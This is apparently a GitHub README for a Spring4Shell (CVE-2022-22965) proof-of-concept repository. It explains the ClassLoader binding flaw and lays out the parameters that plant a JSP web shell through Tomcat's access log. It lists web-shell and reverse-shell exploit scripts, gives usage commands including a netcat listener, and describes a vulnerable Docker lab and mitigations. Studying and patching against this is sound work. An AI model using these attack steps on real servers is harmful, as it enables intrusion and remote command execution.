march0n/PoC-CVE-2022-22965-Spring4Shell

# PoC — CVE-2022-22965 (Spring4Shell) Study and proof-of-concept for CVE-2022-22965, a critical Remote Code Execution (RCE) vulnerability in Spring Framework, publicly disclosed in April 2022. ## Vulnerability Overview **Spring4Shell** affects Spring MVC and Spring WebFlux applications when all of the following conditions are met: | Condition | Value | |---|---| | JDK version | 9 or higher | | Application server | Apache Tomcat | | Packaging | WAR (not executable JAR) | | Spring Framework | < 5.3.18 or < 5.2.20 | ### How it works Spring's data binding mechanism allows HTTP request parameters to be mapped to Java object properties using dot notation (e.g., `user.name=foo`). The vulnerability arises because this traversal is not properly restricted — an attacker can reach the JVM `ClassLoader` through the model object's class hierarchy: class.module.classLoader.resources.context.parent.pipeline.first. This path reaches Tomcat's `AccessLogValve`, whose logging configuration can be manipulated at runtime. By modifying properties such as `pattern`, `directory`, `prefix`, and `suffix`, the attacker redirects Tomcat's access log to write a file with a `.jsp` extension containing arbitrary JSP code — effectively planting a **web shell** on the server. ### Attack flow 1. POST /vulnerable class.module.classLoader.resources.context.parent.pipeline.first.pattern= class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 2. Tomcat writes the access log to webapps/ROOT/shell.jsp with the injected payload 3. GET /shell.jsp?cmd=id → RCE ## Repository Structure . ├── exploits/ │ ├── exploit1.py # POST-based web shell with password protection │ ├── exploit2.py # POST-based web shell with reset capability │ ├── exploit3.py # GET-based variant (simplified) │ ├── exploit4.py # Reverse TCP shell (GET-based) │ └── exploit4b.py # Reverse TCP shell (POST-based) └── springmvc5-helloworld-example/ ├── Dockerfile # Uses pre-built tomcat:9.0.60 image ├── Dockerfile2 # Builds from openjdk:11 + downloads Tomcat ├── pom.xml # Maven project — Spring MVC 5.3.17 (vulnerable) └── src/ # Vulnerable Spring MVC application source ## Exploit Variants | Script | Method | Payload | Notes | |---|---|---|---| | `exploit1.py` | POST | Web shell (password-protected) | Single request | | `exploit2.py` | POST | Web shell | Resets log config before/after exploit | | `exploit3.py` | GET | Web shell (no password) | Parameters via query string | | `exploit4.py` | GET | Reverse TCP shell | msfvenom-based JSP payload | | `exploit4b.py`| POST | Reverse TCP shell | Same payload as exploit4, POST variant | ### Usage example # Web shell python3 exploits/exploit1.py http://target:8080/vulnerable # Reverse shell (start listener first: nc -lvnp 4444) python3 exploits/exploit4.py --url http://target:8080/vulnerable --lhost --lport 4444 ## Lab Setup ### Prerequisites - Java 11+ - Maven (`sudo apt install maven` or `sudo dnf install maven`) - Docker (optional, recommended) ### Build cd springmvc5-helloworld-example mvn clean package ### Run with Docker # Option 1 — pre-built Tomcat image docker build -t spring4shell . docker run -p 8082:8080 spring4shell # Option 2 — build from openjdk + download Tomcat docker build -t spring4shell -f Dockerfile2 . docker run -p 8082:8080 spring4shell The application is then available at `http://localhost:8082/vulnerable`. ## Mitigation - **Upgrade Spring Framework** to 5.3.18+ or 5.2.20+ - **Upgrade Spring Boot** to 2.6.6+ or 2.5.12+ - If upgrading is not immediately possible: - Downgrade to JDK 8 - Use `WebDataBinder.setDisallowedFields()` to block `classLoader` binding - Deploy a WAF rule blocking parameters containing `class.`, `Class.`, `module.`, or `classLoader` ## References - [CVE-2010-1622 — original Spring ClassLoader exploit (2010)](http://blog.o0o.nu/2010/06/cve-2010-1622.html) - [Initial Chinese disclosure (Weixin)](https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw) - [Microsoft Security Blog — SpringShell guidance](https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/) - [LunaSec — Spring RCE vulnerabilities analysis](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/) - [Palo Alto Unit 42 — CVE-2022-22965 deep dive](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/)